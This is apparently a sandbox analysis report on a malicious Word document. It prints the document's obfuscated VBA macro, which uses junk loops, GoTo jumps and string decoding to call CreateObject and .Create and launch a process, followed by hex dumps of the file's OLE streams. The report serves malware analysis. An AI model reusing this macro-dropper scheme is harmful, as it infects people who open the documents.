                                                                dscc = "sadsaccc" & OlVYDaAK.Range
                                                                yNTJYEFj = UBound(iVxnxGH) - 1
                                                                pblpJEP = 0
                                                        Set bquxP = zIlZF
                                                                Do Until yNTJYEFj > yNTJYEFj
                                                                    If iVxnxGH(yNTJYEFj) = 46 Or yNTJYEFj = yNTJYEFj Then
                                                                        dscc = "sasdsacc" & (pblpJEP / 2) + 1 & " to " & (yNTJYEFj / 2) + 1 & MidB$(iVxnxGH, pblpJEP + 1, yNTJYEFj - pblpJEP + 3)
                                                                        pblpJEP = yNTJYEFj + 2
                                                                    End If
                                                                    yNTJYEFj = yNTJYEFj + 2
                                                                Loop
                                                            Next
                                                        rYDvv:
                                                        Cew5ncdrgctcj = D72efu7a0how7es + C22jnnyve59b2 + Cyum5s6729q4h + wjnsc + T8m6rm0ljeoit
                                                           GoTo tgyiIBI
                                                        Set yJRyW = IeEnJ
                                                            Dim FJGWlF, boTEsG, DAKdJA As Long
                                                            Dim kjSGfNWH As Word.Paragraph
                                                            Dim NTrejcdK() As Byte
                                                            For Each kjSGfNWH In Tvh1u8793dltn9.Paragraphs
                                                                NTrejcdK = kjSGfNWH.Range
                                                                dscc = "sadsaccc" & kjSGfNWH.Range
                                                                boTEsG = UBound(NTrejcdK) - 1
                                                                FJGWlF = 0
                                                        Set LVHhGsGJd = PRawGB
                                                                Do Until boTEsG > boTEsG
                                                                    If NTrejcdK(boTEsG) = 46 Or boTEsG = boTEsG Then
                                                                        dscc = "sasdsacc" & (FJGWlF / 2) + 1 & " to " & (boTEsG / 2) + 1 & MidB$(NTrejcdK, FJGWlF + 1, boTEsG - FJGWlF + 3)
                                                                        FJGWlF = boTEsG + 2
                                                                    End If
                                                                    boTEsG = boTEsG + 2
                                                                Loop
                                                            Next
                                                        tgyiIBI:
                                                        Pey8y7gr_e6_y = K532dwnyk0pybrc(Cew5ncdrgctcj)
                                                           GoTo urNCUFJBF
                                                        Set aekya = NDNfzBJJ
                                                            Dim QyRiIm, WEIxlI, rZGGJBDEH As Long
                                                            Dim EvkuEA As Word.Paragraph
                                                            Dim ZFzwZcA() As Byte
                                                            For Each EvkuEA In Tvh1u8793dltn9.Paragraphs
                                                                ZFzwZcA = EvkuEA.Range
                                                                dscc = "sadsaccc" & EvkuEA.Range
                                                                WEIxlI = UBound(ZFzwZcA) - 1
                                                                QyRiIm = 0
                                                        Set Gownu = BLbjEJvG
                                                                Do Until WEIxlI > WEIxlI
                                                                    If ZFzwZcA(WEIxlI) = 46 Or WEIxlI = WEIxlI Then
                                                                        dscc = "sasdsacc" & (QyRiIm / 2) + 1 & " to " & (WEIxlI / 2) + 1 & MidB$(ZFzwZcA, QyRiIm + 1, WEIxlI - QyRiIm + 3)
                                                                        QyRiIm = WEIxlI + 2
                                                                    End If
                                                                    WEIxlI = WEIxlI + 2
                                                                Loop
                                                            Next
                                                        urNCUFJBF:
                                                        Set V5rp8m_1bqwi1poyk = CreateObject(Pey8y7gr_e6_y)
                                                           GoTo TQOflAN
                                                        Set arTLjQ = BeNoB
                                                            Dim iqpwDAG, nSFIYBiG, KqVudsGK As Long
                                                            Dim wFpBJBJE As Word.Paragraph
                                                            Dim bKloWCbL() As Byte
                                                            For Each wFpBJBJE In Tvh1u8793dltn9.Paragraphs
                                                                bKloWCbL = wFpBJBJE.Range
                                                                dscc = "sadsaccc" & wFpBJBJE.Range
                                                                nSFIYBiG = UBound(bKloWCbL) - 1
                                                                iqpwDAG = 0
                                                        Set Mpmet = qqdsB
                                                                Do Until nSFIYBiG > nSFIYBiG
                                                                    If bKloWCbL(nSFIYBiG) = 46 Or nSFIYBiG = nSFIYBiG Then
                                                                        dscc = "sasdsacc" & (iqpwDAG / 2) + 1 & " to " & (nSFIYBiG / 2) + 1 & MidB$(bKloWCbL, iqpwDAG + 1, nSFIYBiG - iqpwDAG + 3)
                                                                        iqpwDAG = nSFIYBiG + 2
                                                                    End If
                                                                    nSFIYBiG = nSFIYBiG + 2
                                                                Loop
                                                            Next
                                                        TQOflAN:
                                                        njcnja = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))
                                                        nnjasd = K532dwnyk0pybrc(njcnja)
                                                           GoTo OgZqDzXrC
                                                        Set FSWADGB = SlFMhE
                                                            Dim fWUcJcE, bDqBloVC, OZDOK As Long
                                                            Dim JRtnBYH As Word.Paragraph
                                                            Dim pXRdBD() As Byte
                                                            For Each JRtnBYH In Tvh1u8793dltn9.Paragraphs
                                                                pXRdBD = JRtnBYH.Range
                                                                dscc = "sadsaccc" & JRtnBYH.Range
                                                                bDqBloVC = UBound(pXRdBD) - 1
                                                                fWUcJcE = 0
                                                        Set axZmGGE = TtNYEBE
                                                                Do Until bDqBloVC > bDqBloVC
                                                                    If pXRdBD(bDqBloVC) = 46 Or bDqBloVC = bDqBloVC Then
                                                                        dscc = "sasdsacc" & (fWUcJcE / 2) + 1 & " to " & (bDqBloVC / 2) + 1 & MidB$(pXRdBD, fWUcJcE + 1, bDqBloVC - fWUcJcE + 3)
                                                                        fWUcJcE = bDqBloVC + 2
                                                                    End If
                                                                    bDqBloVC = bDqBloVC + 2
                                                                Loop
                                                            Next
                                                        OgZqDzXrC:
                                                        V5rp8m_1bqwi1poyk.Create nnjasd, Koy_r2oxzs1, X2yj58n39t50co
                                                           GoTo ScLedvBEA
                                                        Set yktdUg = kxpwbBJF
                                                            Dim wEvDIdG, lqbmGD, elJkJIB As Long
                                                            Dim IVjOAGZe As Word.Paragraph
                                                            Dim FcotIf() As Byte
                                                            For Each IVjOAGZe In Tvh1u8793dltn9.Paragraphs
                                                                FcotIf = IVjOAGZe.Range
                                                                dscc = "sadsaccc" & IVjOAGZe.Range
                                                                lqbmGD = UBound(FcotIf) - 1
                                                                wEvDIdG = 0
                                                        Set sJtmJ = UYxXOcIJG
                                                                Do Until lqbmGD > lqbmGD
                                                                    If FcotIf(lqbmGD) = 46 Or lqbmGD = lqbmGD Then
                                                                        dscc = "sasdsacc" & (wEvDIdG / 2) + 1 & " to " & (lqbmGD / 2) + 1 & MidB$(FcotIf, wEvDIdG + 1, lqbmGD - wEvDIdG + 3)
                                                                        wEvDIdG = lqbmGD + 2
                                                                    End If
                                                                    lqbmGD = lqbmGD + 2
                                                                Loop
                                                            Next
                                                        ScLedvBEA:
                                                        End Function
                                                        Function K532dwnyk0pybrc(Ev1oy1be511zamut8)
                                                        On Error Resume Next
                                                           GoTo pzxJi
                                                        Set wrpigDnBA = bHGFAGJ
                                                            Dim fUGOALvdN, FKISJTLG, OpNHJEa As Long
                                                            Dim ZlnBbxF As Word.Paragraph
                                                            Dim pxjzGA() As Byte
                                                            For Each ZlnBbxF In Tvh1u8793dltn9.Paragraphs
                                                                pxjzGA = ZlnBbxF.Range
                                                                dscc = "sadsaccc" & ZlnBbxF.Range
                                                                FKISJTLG = UBound(pxjzGA) - 1
                                                                fUGOALvdN = 0
                                                        Set xNIlBBInl = OaOIEKmCA
                                                                Do Until FKISJTLG > FKISJTLG
                                                                    If pxjzGA(FKISJTLG) = 46 Or FKISJTLG = FKISJTLG Then
                                                                        dscc = "sasdsacc" & (fUGOALvdN / 2) + 1 & " to " & (FKISJTLG / 2) + 1 & MidB$(pxjzGA, fUGOALvdN + 1, FKISJTLG - fUGOALvdN + 3)
                                                                        fUGOALvdN = FKISJTLG + 2
                                                                    End If
                                                                    FKISJTLG = FKISJTLG + 2
                                                                Loop
                                                            Next
                                                        pzxJi:
                                                        Lynlzg8g_wcyt8ojr = Ev1oy1be511zamut8
                                                           GoTo QtjyA
                                                        Set phkpFqFCH = DHwdFs
                                                            Dim nHiSH, jHDSG, udnviH As Long
                                                            Dim DLwSlnDF As Word.Paragraph
                                                            Dim pXPTCf() As Byte
                                                            For Each DLwSlnDF In Tvh1u8793dltn9.Paragraphs
                                                                pXPTCf = DLwSlnDF.Range
                                                                dscc = "sadsaccc" & DLwSlnDF.Range
                                                                jHDSG = UBound(pXPTCf) - 1
                                                                nHiSH = 0
                                                        Set seTGCvRG = mwvhyA
                                                                Do Until jHDSG > jHDSG
                                                                    If pXPTCf(jHDSG) = 46 Or jHDSG = jHDSG Then
                                                                        dscc = "sasdsacc" & (nHiSH / 2) + 1 & " to " & (jHDSG / 2) + 1 & MidB$(pXPTCf, nHiSH + 1, jHDSG - nHiSH + 3)
                                                                        nHiSH = jHDSG + 2
                                                                    End If
                                                                    jHDSG = jHDSG + 2
                                                                Loop
                                                            Next
                                                        QtjyA:
                                                        E4u6ubi3v5l2 = Yw0lmj9uz2sfz0(Lynlzg8g_wcyt8ojr)
                                                           GoTo XxLEEC
                                                        Set ZtgGUHFGJ = prgAO
                                                            Dim TMQhTRa, LZepVwu, JPHDBd As Long
                                                            Dim bkUZDN As Word.Paragraph
                                                            Dim QNtsSHe() As Byte
                                                            For Each bkUZDN In Tvh1u8793dltn9.Paragraphs
                                                                QNtsSHe = bkUZDN.Range
                                                                dscc = "sadsaccc" & bkUZDN.Range
                                                                LZepVwu = UBound(QNtsSHe) - 1
                                                                TMQhTRa = 0
                                                        Set MxAtNhGI = imnrzOF
                                                                Do Until LZepVwu > LZepVwu
                                                                    If QNtsSHe(LZepVwu) = 46 Or LZepVwu = LZepVwu Then
                                                                        dscc = "sasdsacc" & (TMQhTRa / 2) + 1 & " to " & (LZepVwu / 2) + 1 & MidB$(QNtsSHe, TMQhTRa + 1, LZepVwu - TMQhTRa + 3)
                                                                        TMQhTRa = LZepVwu + 2
                                                                    End If
                                                                    LZepVwu = LZepVwu + 2
                                                                Loop
                                                            Next
                                                        XxLEEC:
                                                        K532dwnyk0pybrc = E4u6ubi3v5l2
                                                           GoTo SWSoCG
                                                        Set OaVnI = UmQHurWB
                                                            Dim zxEzinCG, EHISACDA, aBRvB As Long
                                                            Dim XdfYSIXX As Word.Paragraph
                                                            Dim wWvlxHJH() As Byte
                                                            For Each XdfYSIXX In Tvh1u8793dltn9.Paragraphs
                                                                wWvlxHJH = XdfYSIXX.Range
                                                                dscc = "sadsaccc" & XdfYSIXX.Range
                                                                EHISACDA = UBound(wWvlxHJH) - 1
                                                                zxEzinCG = 0
                                                        Set wVEbaDF = WhmkB
                                                                Do Until EHISACDA > EHISACDA
                                                                    If wWvlxHJH(EHISACDA) = 46 Or EHISACDA = EHISACDA Then
                                                                        dscc = "sasdsacc" & (zxEzinCG / 2) + 1 & " to " & (EHISACDA / 2) + 1 & MidB$(wWvlxHJH, zxEzinCG + 1, EHISACDA - zxEzinCG + 3)
                                                                        zxEzinCG = EHISACDA + 2
                                                                    End If
                                                                    EHISACDA = EHISACDA + 2
                                                                Loop
                                                            Next
                                                        SWSoCG:
                                                        End Function
                                                        Function Yw0lmj9uz2sfz0(Vld8aalp9dc)
                                                           GoTo nhgrV
                                                        Set nfGGCgIdG = JltZHC
                                                            Dim cxvFCyK, lTApi, gLahNHF As Long
                                                            Dim ooYfBGDHB As Word.Paragraph
                                                            Dim hVgaFGj() As Byte
                                                            For Each ooYfBGDHB In Tvh1u8793dltn9.Paragraphs
                                                                hVgaFGj = ooYfBGDHB.Range
                                                                dscc = "sadsaccc" & ooYfBGDHB.Range
                                                                lTApi = UBound(hVgaFGj) - 1
                                                                cxvFCyK = 0
                                                        Set QDRLrCD = hbrLsIIaJ
                                                                Do Until lTApi > lTApi
                                                                    If hVgaFGj(lTApi) = 46 Or lTApi = lTApi Then
                                                                        dscc = "sasdsacc" & (cxvFCyK / 2) + 1 & " to " & (lTApi / 2) + 1 & MidB$(hVgaFGj, cxvFCyK + 1, lTApi - cxvFCyK + 3)
                                                                        cxvFCyK = lTApi + 2
                                                                    End If
                                                                    lTApi = lTApi + 2
                                                                Loop
                                                            Next
                                                        nhgrV:
                                                           GoTo NelhA
                                                        Set nVwvHB = iyOuxJbS
                                                            Dim fiGUDJCof, ccUPI, xFjGF As Long
                                                            Dim TIdZDCk As Word.Paragraph
                                                            Dim BMzteJlIE() As Byte
                                                            For Each TIdZDCk In Tvh1u8793dltn9.Paragraphs
                                                                BMzteJlIE = TIdZDCk.Range
                                                                dscc = "sadsaccc" & TIdZDCk.Range
                                                                ccUPI = UBound(BMzteJlIE) - 1
                                                                fiGUDJCof = 0
                                                        Set MSHSTFGF = vcpiDgaED
                                                                Do Until ccUPI > ccUPI
                                                                    If BMzteJlIE(ccUPI) = 46 Or ccUPI = ccUPI Then
                                                                        dscc = "sasdsacc" & (fiGUDJCof / 2) + 1 & " to " & (ccUPI / 2) + 1 & MidB$(BMzteJlIE, fiGUDJCof + 1, ccUPI - fiGUDJCof + 3)
                                                                        fiGUDJCof = ccUPI + 2
                                                                    End If
                                                                    ccUPI = ccUPI + 2
                                                                Loop
                                                            Next
                                                        NelhA:
                                                           GoTo qjZyxC
                                                        Set fPJtR = TVnICGBMg
                                                            Dim OGmjSHH, dxYfn, tsgajz As Long
                                                            Dim VwecCsW As Word.Paragraph
                                                            Dim jpCcJn() As Byte
                                                            For Each VwecCsW In Tvh1u8793dltn9.Paragraphs
                                                                jpCcJn = VwecCsW.Range
                                                                dscc = "sadsaccc" & VwecCsW.Range
                                                                dxYfn = UBound(jpCcJn) - 1
                                                                OGmjSHH = 0
                                                        Set ShwUGEG = HoDns
                                                                Do Until dxYfn > dxYfn
                                                                    If jpCcJn(dxYfn) = 46 Or dxYfn = dxYfn Then
                                                                        dscc = "sasdsacc" & (OGmjSHH / 2) + 1 & " to " & (dxYfn / 2) + 1 & MidB$(jpCcJn, OGmjSHH + 1, dxYfn - OGmjSHH + 3)
                                                                        OGmjSHH = dxYfn + 2
                                                                    End If
                                                                    dxYfn = dxYfn + 2
                                                                Loop
                                                            Next
                                                        qjZyxC:
                                                        Yw0lmj9uz2sfz0 = Replace(Vld8aalp9dc, "x [ sh b", Zi0fdg4qf12t)
                                                           GoTo CMhXU
                                                        Set yEbqhrSDE = ElQBeG
                                                            Dim KGTisCFg, htkDBkB, QbynDCF As Long
                                                            Dim wUyzGJ As Word.Paragraph
                                                            Dim YXZHHCaB() As Byte
                                                            For Each wUyzGJ In Tvh1u8793dltn9.Paragraphs
                                                                YXZHHCaB = wUyzGJ.Range
                                                                dscc = "sadsaccc" & wUyzGJ.Range
                                                                htkDBkB = UBound(YXZHHCaB) - 1
                                                                KGTisCFg = 0
                                                        Set oyFNHnHHI = xhcZSBIH
                                                                Do Until htkDBkB > htkDBkB
                                                                    If YXZHHCaB(htkDBkB) = 46 Or htkDBkB = htkDBkB Then
                                                                        dscc = "sasdsacc" & (KGTisCFg / 2) + 1 & " to " & (htkDBkB / 2) + 1 & MidB$(YXZHHCaB, KGTisCFg + 1, htkDBkB - KGTisCFg + 3)
                                                                        KGTisCFg = htkDBkB + 2
                                                                    End If
                                                                    htkDBkB = htkDBkB + 2
                                                                Loop
                                                            Next
                                                        CMhXU:
                                                           GoTo BhNEmrIE
                                                        Set PDdhFK = fPExO
                                                            Dim YgziIE, DwikAuvE, fEtRs As Long
                                                            Dim YvQjieFc As Word.Paragraph
                                                            Dim VuThCQHH() As Byte
                                                            For Each YvQjieFc In Tvh1u8793dltn9.Paragraphs
                                                                VuThCQHH = YvQjieFc.Range
                                                                dscc = "sadsaccc" & YvQjieFc.Range
                                                                DwikAuvE = UBound(VuThCQHH) - 1
                                                                YgziIE = 0
                                                        Set WfWmdXBB = obcJwDFA
                                                                Do Until DwikAuvE > DwikAuvE
                                                                    If VuThCQHH(DwikAuvE) = 46 Or DwikAuvE = DwikAuvE Then
                                                                        dscc = "sasdsacc" & (YgziIE / 2) + 1 & " to " & (DwikAuvE / 2) + 1 & MidB$(VuThCQHH, YgziIE + 1, DwikAuvE - YgziIE + 3)
                                                                        YgziIE = DwikAuvE + 2
                                                                    End If
                                                                    DwikAuvE = DwikAuvE + 2
                                                                Loop
                                                            Next
                                                        BhNEmrIE:
                                                           GoTo VcRJFFPFy
                                                        Set dMAig = FVoXJ
                                                            Dim wzAgBA, zZJyEAC, YqhWFED As Long
                                                            Dim tVHJH As Word.Paragraph
                                                            Dim DLNPo() As Byte
                                                            For Each tVHJH In Tvh1u8793dltn9.Paragraphs
                                                                DLNPo = tVHJH.Range
                                                                dscc = "sadsaccc" & tVHJH.Range
                                                                zZJyEAC = UBound(DLNPo) - 1
                                                                wzAgBA = 0
                                                        Set swiEYEUA = ZGOfHDFZ
                                                                Do Until zZJyEAC > zZJyEAC
                                                                    If DLNPo(zZJyEAC) = 46 Or zZJyEAC = zZJyEAC Then
                                                                        dscc = "sasdsacc" & (wzAgBA / 2) + 1 & " to " & (zZJyEAC / 2) + 1 & MidB$(DLNPo, wzAgBA + 1, zZJyEAC - wzAgBA + 3)
                                                                        wzAgBA = zZJyEAC + 2
                                                                    End If
                                                                    zZJyEAC = zZJyEAC + 2
                                                                Loop
                                                            Next
                                                        VcRJFFPFy:
                                                        End Function

                                                        Streams

                                                        Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                                        General
                                                        Stream Path:\x1CompObj
                                                        File Type:data
                                                        Stream Size:146
                                                        Entropy:4.00187355764
                                                        Base64 Encoded:False
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                        General
                                                        Stream Path:\x5DocumentSummaryInformation
                                                        File Type:data
                                                        Stream Size:4096
                                                        Entropy:0.280441275353
                                                        Base64 Encoded:False
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . . . . . . j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 580
                                                        General
                                                        Stream Path:\x5SummaryInformation
                                                        File Type:data
                                                        Stream Size:580
                                                        Entropy:4.27068051483
                                                        Base64 Encoded:False
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 14 02 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 68 01 00 00 04 00 00 00 4c 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 d0 00 00 00 09 00 00 00 dc 00 00 00
                                                        Stream Path: 1Table, File Type: data, Stream Size: 6873
                                                        General
                                                        Stream Path:1Table
                                                        File Type:data
                                                        Stream Size:6873
                                                        Entropy:6.02451032197
                                                        Base64 Encoded:True
                                                        Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                        Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                        Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 513
                                                        General
                                                        Stream Path:Macros/PROJECT
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Stream Size:513
                                                        Entropy:5.45796741226
                                                        Base64 Encoded:True
                                                        Data ASCII:I D = " { A E 2 F 0 F 9 F - 1 A 9 0 - 4 C B D - 9 8 9 D - 0 7 4 8 C 8 7 B D 5 4 3 } " . . D o c u m e n t = T v h 1 u 8 7 9 3 d l t n 9 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = T w h 1 g b 2 m p d 3 . . M o d u l e = X 1 b q z 0 q a e r 4 3 b 5 2 b f . . E x e N a m e 3 2 = " X o k y b e 1 s n 0 s g n " . . N a m e = " D D " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C 6 C 4 C A 4 9 F A 7 B 9 7 7 F 9 7 7 F 9 7 7 F 9 7 7 F " . . D P B
                                                        Data Raw:49 44 3d 22 7b 41 45 32 46 30 46 39 46 2d 31 41 39 30 2d 34 43 42 44 2d 39 38 39 44 2d 30 37 34 38 43 38 37 42 44 35 34 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 76 68 31 75 38 37 39 33 64 6c 74 6e 39 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 54 77 68 31 67 62 32 6d 70 64 33 0d 0a 4d 6f 64 75 6c 65 3d 58 31 62 71 7a 30 71 61 65 72 34 33 62 35 32 62 66 0d 0a 45
                                                        Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 137
                                                        General
                                                        Stream Path:Macros/PROJECTwm
                                                        File Type:data
                                                        Stream Size:137
                                                        Entropy:3.83818292894
                                                        Base64 Encoded:False
                                                        Data ASCII:T v h 1 u 8 7 9 3 d l t n 9 . T . v . h . 1 . u . 8 . 7 . 9 . 3 . d . l . t . n . 9 . . . T w h 1 g b 2 m p d 3 . T . w . h . 1 . g . b . 2 . m . p . d . 3 . . . X 1 b q z 0 q a e r 4 3 b 5 2 b f . X . 1 . b . q . z . 0 . q . a . e . r . 4 . 3 . b . 5 . 2 . b . f . . . . .
                                                        Data Raw:54 76 68 31 75 38 37 39 33 64 6c 74 6e 39 00 54 00 76 00 68 00 31 00 75 00 38 00 37 00 39 00 33 00 64 00 6c 00 74 00 6e 00 39 00 00 00 54 77 68 31 67 62 32 6d 70 64 33 00 54 00 77 00 68 00 31 00 67 00 62 00 32 00 6d 00 70 00 64 00 33 00 00 00 58 31 62 71 7a 30 71 61 65 72 34 33 62 35 32 62 66 00 58 00 31 00 62 00 71 00 7a 00 30 00 71 00 61 00 65 00 72 00 34 00 33 00 62 00 35 00 32
                                                        Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5925
                                                        General
                                                        Stream Path:Macros/VBA/_VBA_PROJECT
                                                        File Type:data
                                                        Stream Size:5925
                                                        Entropy:5.67391358744
                                                        Base64 Encoded:False
                                                        Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                                        Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                                        Stream Path: Macros/VBA/dir, File Type: Tower32/600/400 68020 object not stripped - version 18435, Stream Size: 668
                                                        General
                                                        Stream Path:Macros/VBA/dir
                                                        File Type:Tower32/600/400 68020 object not stripped - version 18435
                                                        Stream Size:668
                                                        Entropy:6.36196685937
                                                        Base64 Encoded:True
                                                        Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . D 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . H . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . . . m . . . . ! O f f i c
                                                        Data Raw:01 98 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 44 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 48 a0 fa 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                                        Stream Path: WordDocument, File Type: data, Stream Size: 118910
                                                        General
                                                        Stream Path:WordDocument
                                                        File Type:data
                                                        Stream Size:118910
                                                        Entropy:7.18905041003
                                                        Base64 Encoded:True
                                                        Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . E r . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . . b . . . b . . . E j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                        Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 45 72 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 7e d0 01 00 62 7f 00 00 62 7f 00 00 45 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
                                                        Stream Path: word, File Type: data, Stream Size: 2632
                                                        General
                                                        Stream Path:word
                                                        File Type:data
                                                        Stream Size:2632
                                                        Entropy:7.92117851063
                                                        Base64 Encoded:True
